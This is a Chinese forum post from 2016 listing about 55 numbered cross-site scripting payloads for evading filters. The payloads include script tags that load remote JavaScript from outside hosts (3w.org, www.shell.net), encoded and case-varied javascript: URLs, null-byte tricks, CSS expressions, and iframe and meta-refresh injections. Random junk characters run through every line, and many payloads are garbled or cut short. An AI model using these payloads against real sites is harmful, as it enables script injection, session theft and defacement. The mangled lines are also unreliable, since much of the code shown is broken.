(1)普通的XSS JavaScript注入9 f& ?- @4 `$ e/ W- M' b/ n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ ]1 w" r% {+ D' ?3 N(99)另类弹框& t5 y! k1 ]/ v$ M: c) U% S! L
<q/oncut=alert()>15 E% @$ a! W" k! C% R
<s/onclick=alert()>b$ |* A' P) H6 u7 J' A
<XSS=" onclick="alert(1)//">clickme</SSX=">
/ m( w/ Z9 B- G# u: N% l4 o <zzz onclick=alert`1`>clickme</zzz>
' }9 h8 y: I1 W! L( z$ \* r1 a2 N <a onclick=alert`1`>clickme</a>7 q, B* A" h8 J- v5 E* B
<a=">clickme</a=">
. S0 L0 J$ F; \/ e- O% n% {5 b<a=">clickme</a>) u e& `7 S5 C
<z=">clickme</z=">
8 K0 t2 r8 c, y& X' t. J ^2 D* t<z onclick=alert`1`>clickme</z>; d$ J1 J4 q& j: U7 l% d7 I
1 x. h3 K& o) |* D4 t(2)IMG标签XSS使用JavaScript命令
: M5 r& Z( b; O<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" t7 H2 v+ z( ?* v' Q- `, U; y7 a
2 c( \8 g5 d, |9 S/ p" q(3)IMG标签无分号无引号
3 C. a! i+ P& _5 z- y' r- K<IMG SRC=javascript:alert(‘XSS’)>
8 f) A. n1 v$ I/ p, I% j
" f3 J* m7 e6 E# Y(4)IMG标签大小写不敏感8 u5 C3 G- e/ ~' {
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
( D) `, i w: J' }' P, Z& T) m% t' J7 N5 b% ]
(5)HTML编码(必须有分号). [0 V# t) _2 K! }9 r
<IMG SRC=javascript:alert(“XSS”)>3 b) Z2 O6 [: N0 d, i
9 N/ A# K( z0 C% a( i(6)修正缺陷IMG标签
4 W4 \$ ?8 M: n! H1 f<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; Y- |9 h6 l' X2 g3 O6 ~$ g. o+ i9 x+ W1 l
(7)formCharCode标签(计算器)1 w& ^* ?# a0 p# G* w5 ~+ O
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& G* n6 q/ \# {1 a( e( I4 E. w7 E3 U4 Z- x! S
(8)UTF-8的Unicode编码(计算器)
% ~7 m; K# k+ L. S& i( W<IMG SRC=jav..省略..S')>
: g+ Y7 A0 J' c% C9 ]$ S. W
+ S: t- z& i$ @6 i9 D(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ z! W% q( @! }' i* o) K4 g
<IMG SRC=jav..省略..S')>+ H! z( Z# p b- R& t
& U, n) h2 t* r9 ~6 N3 }, t
(10)十六进制编码也是没有分号(计算器) Z% c8 z- u4 H% }) r1 T
<IMG SRC=\'#\'" /span>
$ @6 B4 e8 E, |7 c& ?- M5 c+ m/ D0 x5 o. w* o
(11)嵌入式标签,将Javascript分开
+ g: [; d5 `! T7 e: l Y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>8 a2 S! K( ]& k$ i+ N
( ^2 v3 |6 a+ ?$ P8 y8 Q$ q
(12)嵌入式编码标签,将Javascript分开
- t+ ]: s/ X' k* N$ g; A7 C0 y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- V$ W3 X. K m# [
8 q' L6 W0 U& l+ x(13)嵌入式换行符+ [/ y; g4 |, c7 m V" d! B9 }) K! o
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- w7 v) t( a7 ?, k
8 X" C' L: \" G(14)嵌入式回车
6 X* v# V0 N) m% I9 i# P<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 e1 C& X& {0 t0 c5 T- c7 i( t
: w) W7 `) [4 `( c$ V(15)嵌入式多行注入JavaScript,这是XSS极端的例子1 _% b) b" @# \3 _3 t- f
<IMG SRC=\'#\'" /span>
! W0 B# e7 }( [1 @. Q5 t4 v
: \$ P4 G1 _+ }5 t# q5 ^4 n(16)解决限制字符(要求同页面)1 x5 F5 _" A# P+ {+ L
<script>z=’document.’</script>
% N/ x2 A, \6 E* v& z<script>z=z+’write(“‘</script>: R! D( ]+ x& C3 P# W
<script>z=z+’<script’</script>7 j6 B' @8 ?2 ~5 G6 {2 e
<script>z=z+’ src=ht’</script>
6 ~5 X* V' U5 e; T0 s<script>z=z+’tp://ww’</script> q+ B4 x. M# }( E
<script>z=z+’w.shell’</script>
# v% @, x* P- ]8 W' U, e1 y<script>z=z+’.net/1.’</script>
* b) G5 C) B6 q: A! e+ ]9 P<script>z=z+’js></sc’</script>" E7 A& P7 i* ]- d; b# T- R/ n
<script>z=z+’ript>”)’</script>
* Z+ z* J; V+ M- K$ s( A3 X<script>eval_r(z)</script>
. P0 q9 F+ C5 E( w+ o
& N, j% W, V% d# V" S2 V(17)空字符, `* _, W& C4 l2 d- o
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ x) s% Y7 b; O& x& X+ _& s1 m0 L" @9 E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 h8 W0 c9 z+ B0 Q2 [perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 F, e( W8 @, y$ ^# `' i
' U( \0 N0 Y4 T' X4 R# I% O(19)Spaces和meta前的IMG标签
2 \* n8 h/ t5 O& a8 K. T0 L% Y- j<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
' E2 U$ g5 |3 s1 M" q& R0 w1 E0 t6 t o
(20)Non-alpha-non-digit XSS# ~) M7 k7 P5 V
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>: P: F3 R( ] m1 J- |
4 E; Y1 f, p U" x; l
(21)Non-alpha-non-digit XSS to 2
5 J$ u' q7 f; O$ S, c<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> y9 e5 o3 j2 e" D* \5 G/ L1 ]
% E$ x9 ?4 m' q2 ~: @% ~9 [(22)Non-alpha-non-digit XSS to 3. s( t5 V- a! _( s- {' V. M% w
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
/ Z$ T/ y8 F& q/ H3 l: ]- x+ S$ X" F9 m' f" k
(23)双开括号
7 p) E" @' q$ ?! Z3 ]4 M$ b<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ B+ T+ O' Q: @- f# H' u
! y: v" M" m5 {8 r(24)无结束脚本标记(仅火狐等浏览器)
2 k; w. e/ Q, I i, G<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" E, n% j# N0 g& E" h. n
6 u/ g& m, G! e2 [, @) x(25)无结束脚本标记2
" R( I2 D$ z, s& S<SCRIPT SRC=//3w.org/XSS/xss.js>
" i" o( M! C% C# f% e* m0 A" P6 e7 g& \2 d& l& F9 K' A
(26)半开的HTML/JavaScript XSS+ ~0 y; q( B5 Y4 H; T+ p
<IMG SRC=\'#\'" /span>
5 z D4 I) a! C+ C3 Q" g9 A1 e) t4 g/ d( J
(27)双开角括号+ V2 y* T U8 x' N
<iframe src=http://3w.org/XSS.html <
( M) ]; H4 @9 b
! Q% D# u" \: U( f, n8 ?(28)无单引号 双引号 分号
5 s- M* H; W) l2 o# E$ y! h2 E<SCRIPT>a=/XSS/" _0 Y5 B! l9 b0 _+ W
alert(a.source)</SCRIPT>0 e: S8 P: L y- b' P; \* L7 m6 r
/ A8 }% t% q0 Z+ w' L
(29)换码过滤的JavaScript
& S. `# b$ I/ t* _7 l, e: ^2 d; q\”;alert(‘XSS’);//
# j- A( j$ Q+ e& f! _) [- p$ W! E' n2 L, }* x
(30)结束Title标签2 ^/ N' R9 T) M
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: [4 ]4 Y1 Z) A8 s# `4 i1 @
" _ u: d; _( F" K- m7 X2 ?. f4 K
(31)Input Image
6 }0 `1 \* U3 _. H<INPUT SRC=\'#\'" /span>& L3 z& k0 Q/ z; v: _
6 z, _$ y k" T6 ]: ^9 J0 z0 J
(32)BODY Image
* g* @$ u% @* a( e% T7 f<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, ^# L8 [; n+ `9 P- {' d; j6 H T! e. a p( Q0 H
(33)BODY标签' b a/ t1 Y4 {
<BODY(‘XSS’)>3 W8 s6 f$ \2 Z* q
1 f& w& R i2 y. Q1 f7 {
(34)IMG Dynsrc; ^" O1 z' F7 y- c! g& ^
<IMG DYNSRC=\'#\'" /span>) ?, T0 N% J0 s& L4 V9 l0 Q, N
+ ~) U) Z( f' T. W
(35)IMG Lowsrc
- i1 Q1 P h9 v8 F<IMG LOWSRC=\'#\'" /span>
/ `& U0 K) A# t8 O9 H' h, F3 v7 y" b* O4 E
(36)BGSOUND0 ?+ a2 y; z: K1 l! `
<BGSOUND SRC=\'#\'" /span>
. P- C' W" ^3 k$ j3 d
$ ]1 C6 d# O7 u2 @! G1 _ ~(37)STYLE sheet$ ^$ F/ @$ F4 R! j: n- o
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 V- K* W8 A! \8 i7 p: C, }- [( y0 k# E, j1 l
(38)远程样式表7 @: g! Q/ E& e1 G5 n$ u- H/ d6 [- V
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
5 J+ A+ m0 H/ ]8 [) C; w
0 J7 n8 F/ W" {0 m(39)List-style-image(列表式). m8 b' b$ t, p0 A3 P% N8 g# C2 [
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 y+ V- r) X. m# J) @. E3 b
% x7 c! y/ o9 _9 y
(40)IMG VBscript
! s/ j" f$ X( v. L7 K5 a<IMG SRC=\'#\'" /STYLE><UL><LI>XSS l8 ^- L% D1 y# ^$ X( \" _
6 m. x, Y, y7 x" V* g# S
(41)META链接url3 x" p/ a2 b8 H l# V: ^$ J9 t
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 C) {* h* w" u N+ f$ _% y0 b! ^' ?# I! t. i
(42)Iframe$ u8 @ S1 Z9 \
<IFRAME SRC=\'#\'" /IFRAME>
' V; V. `9 O% N5 a5 J
- U0 h; o4 W/ R" l- g$ D; `(43)Frame
' ]) l, p" m; q* @9 J- V<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>* |- ?, q* K/ m7 }$ @- S! A
* e$ R8 u/ N) R4 I+ j1 ]( q: C; W(44)Table
* V$ l% B; P1 g3 l7 \; T<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 D: Y1 s* x/ W& N6 p$ N
' U( ]# `) @, C- j! X( R+ ]
(45)TD n4 S' [2 q% \9 c" J7 ?+ @
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* H5 J2 t! X6 r0 i% [
) n H" u! B: Z. u* y$ S) _, K
(46)DIV background-image; z5 w# |7 {6 P; {# V6 z+ ^1 d
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 Z/ p; c4 J: T/ v, `
( u N' e' d' v% L(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
2 n6 @7 w* L" Q7 F<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”> b0 T4 {. E) ?8 C0 T b" y6 [
# v: Y) Z+ |4 P(48)DIV expression& Q& v+ S H- w- f
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>* @- f4 l1 I) n! n* b- o
8 A0 c* g8 M' g8 {(49)STYLE属性分拆表达
6 Q5 p* Q8 L* U* \$ G<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
9 T( Q1 Y+ R+ v2 I% N+ P* k \- h9 y: v w
(50)匿名STYLE(组成:开角号和一个字母开头)
3 _6 u) o) c% O- P, s' ~, G<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" l+ N! j2 G/ f8 w. D4 f8 t7 j
$ `7 i0 P5 g9 t5 z8 o0 ?, ~0 V
(51)STYLE background-image
7 C% @$ a% C8 w; [<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 C6 E2 u7 C9 C* o; }9 T
; ?" H6 S) s) u; x" B(52)IMG STYLE方式
5 D+ h% { H5 z$ m2 Lexppression(alert(“XSS”))’> a9 c5 w l! `$ l
9 |& a3 i4 ^/ a(53)STYLE background' O5 m8 B5 t- e! `2 B s- [' w
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>, c/ v Q5 \( N1 T3 x0 q& A1 k
8 L, M0 U; @/ q. |4 E(54)BASE4 q0 L6 q S2 t5 n; h# |% V
<BASE HREF=”javascript:alert(‘XSS’);//”>
1 |2 V$ _/ \4 X3 O- S+ _4 ^. W6 O9 Q9 M) F+ Q
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ l2 h% W( g, }- @# }- F; s Y<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>; _' r, m9 e) f1 B3 \
|
发表于 2016-4-28 10:06:15
收藏
支持
反对